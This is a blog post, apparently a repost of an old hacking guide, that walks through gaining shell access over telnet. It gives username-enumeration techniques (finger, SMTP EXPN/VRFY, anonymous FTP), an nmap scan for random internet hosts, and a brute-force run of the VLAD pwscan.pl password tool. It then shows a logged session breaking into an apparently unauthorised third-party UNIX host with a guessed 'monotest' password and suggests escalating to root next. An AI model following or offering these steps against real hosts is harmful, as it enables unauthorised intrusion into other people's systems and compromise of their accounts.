Friday, September 3, 2010

Telnet (23 TCP)

Telnet (23 TCP)
The most prized port to find open could be the telnet port. An open telnet port usually denotes an UNIX host or a router. Sometimes an AS400 or mainframe could be found. Why are we excited about an open telnet port? The reason is twofold. First - the host may contain sensitive data in directories that are not properly protected - see the section on "finding the goods". The second reason is that UNIX hosts are the ideal "relaunch" platform. What I mean by this is that your should be able to upload your entire "toolbox" to the server, that you should be able to attack hosts that are usually firewalled or not routed from this server. Even if you are not able to upload a toolbox you should be able to telnet to other (internal) servers from a router or a UNIX server. How do we go about getting a shell (or Router prompt)? Usually a username and a password are required. In some cases only a username is needed, and in some cases only a password is needed for Cisco routers. The bottom line is that we need two or less "things" - be that a username or a password. How do we find these two things? There are some techniques to find a username (many of these techniques were used in our previous penetration testing example, so I will not show input/output):
1. Some routers or UNIX hosts will tell you when you have entered an incorrect username - even if you don't provide a password.
2. Telnet to port 25 and try to issue EXPN and VRFY commands. Try to expand (EXPN) list-like aliases such as abuse, info, list, all etc. In many cases these point to valid usernames.
3. Try to finger a user on the host. Later in this document we will look at finger techniques :)
4. Try anonymous FTP and get the password file in /etc. Although it should be shadowed, it may reveal valid usernames
5. Try anonymous FTP and do a cd ~user_to_test_for - see the section on FTP.
6. Use default usernames. A nice list of default usernames and passwords can be found at www.nerdnet.com/security/index.php
7. Try common usernames such as "test", "demo", "test01" etc.
8. Use the hostname or a derivative of the hostname as username.
9. See if the host is running a webserver and have a look at the website - you might learn more than you expect - look at the "Contact" section and see if you can't mine some usernames. Looking at the website may also help you to guess common usernames.
Ok, so now you have a rather long list of possible usernames. The idea would be to verify that these users exist. It would be a bonus if you could verify that the users exist. If we cannot verify that the user is valid we have to test it via the telnet protocol. We still need a password. Unfortunately there is no easy way to verify a password - you have to test this manually. Manually?! I don't think so! BindView Corporation's RAZOR security team provided the world with VLAD (get it here http://razor.bindview.com/tools/vlad/), a tool that packaged some very useful tools. One of these tools has the ability to test usernames and passwords for (amongst other things) telnet. (The tool does not have support for password only telnet daemons - such as some routers, but the author tells me they are looking into it). Without getting too involved in this tool, lets see how our technique works against an arbitrary host (to find a totally arbitrary host we use nmap to find a random host with open port 23: nmap -sT -iR -p 23) Nmap finds the site 216.xxx.162.79 open to telnet:
/tmp# telnet 216.xxx.162.79
Trying 216.xxx.162.79...
Connected to 216.xxx.162.79.
Escape character is '^]'.
SunOS 5.6
xxx.xxx.com
Welcome to xxxxxxxxxxxxx
force Running Solaris 2.6.0
login:
We telnet to port 25, and find that there are no mail daemon running - no EXPN or VFRY possibilities. It seems that there are no anonymous FTP - no getting the password file. The finger daemon is also not running. Let us leave this host alone - we don't want to offend XXX - they have implemented some measures to keep people out.
Another IP that nmap gives us is 216.xxx.140.132. This host (SCO UNIX) is running Sendmail and finger. When we do a finger command, we find many usernames. To get these into a single file we issue the following command:
finger @216.xxx.140.132 | awk '{print $1}' | uniq > usernames
The next step would be to see if can use these usernames with common passwords. We use VLAD's brute force telnet module as follows:
perl pwscan.pl -v -T 216.xxx.140.132,
with the usernames in the file account.db. The output of the pwscan.pl PERL script looks like this:
/ports/vlad-0.7.1# perl pwscan.pl -v -T 216.xxx.140.132
RAZOR password scanner - version: $Id: pwscan.pl,v 1.17 2000/07/24 17:14:43 loveless Exp $
Checking 216.xxx.140.132
telnet check. User:angela, pass:angela
telnet check. User:angela, pass:
telnet check. User:angela, pass:12345
telnet check. User:angela, pass:abcdef
telnet check. User:angela, pass:god
telnet check. User:angela, pass:guess
telnet check. User:angela, pass:none
telnet check. User:angela, pass:password
telnet check. User:angela, pass:qwerty
telnet check. User:angela, pass:secret
telnet check. User:angela, pass:sex
telnet check. User:angela, pass:test
---cut---
Running through all usernames and common passwords, we find ..nothing. No username could be brute forced. Now what? The next step is to find more usernames. We attempt to the following:
finger test@216.xxx.140.132
The output looks like this: /tmp# finger test@216.xxx.140.132
[216.xxx.140.132]
Login name: test In real life: TEST ACCOUNT
Directory: /home/test Shell: /OpenServer/bin/sh
Never logged in.
No unread mail
No Plan.
Login name: monotest In real life: Monorail Test
Directory: /home/monotest Shell: /OpenServer/bin/sh
Last login Fri Aug 4 12:10 on pts038 from www.multiuser.cH
No unread mail
No Plan.
This looks promising. The "test" user does not seem to have a weak password - we test it manually. The "monotest" user however delivers...logging in with username "monotest", and password "monotest" we gain access to the UNIX host:
/tmp# telnet 216.xxx.140.132
Trying 216.xxx.140.132...
Connected to xxxx.com.
Escape character is '^]'.
SCO UnixWare 7.1.0 (xxxx) (pts/42)
login: monotest
Password:
UnixWare 7.1.0
musapp
Copyright (c) 1976-1998 The Santa Cruz Operation, Inc. and its suppliers.
All Rights Reserved.
RESTRICTED RIGHTS LEGEND:
When licensed to a U.S., State, or Local Government,
all Software produced by SCO is commercial computer software
as defined in FAR 12.212, and has been developed exclusively
at private expense. All technical data, or SCO commercial
computer software/documentation is subject to the provisions
of FAR 12.211 - "Technical Data", and FAR 12.212 - "Computer
Software" respectively, or clauses providing SCO equivalent
protections in DFARS or other agency specific regulations.
Manufacturer: The Santa Cruz Operation, Inc., 400 Encinal
Street, Santa Cruz, CA 95060.
Last login: Fri Aug 4 12:10:15 2000 on pts038
NOTICE: Unregistered SCO software is installed on your system. Please
refer to SCO's online help for registration information.
$ exit
The interesting thing about this is that the finger daemon returns all usernames that contains the word "test". In the same way we can finger users such as "admin", and "user", and get interesting results.
Most machines that are running telnet, and has more than a certain amount of users (mostly multi-user machines) almost always hosts users with weak or no passwords - the idea is just to find them. From here it is fairly certain that you will find a local SCO exploit that will elevate you to root. 38

No comments:

Post a Comment

hacking tools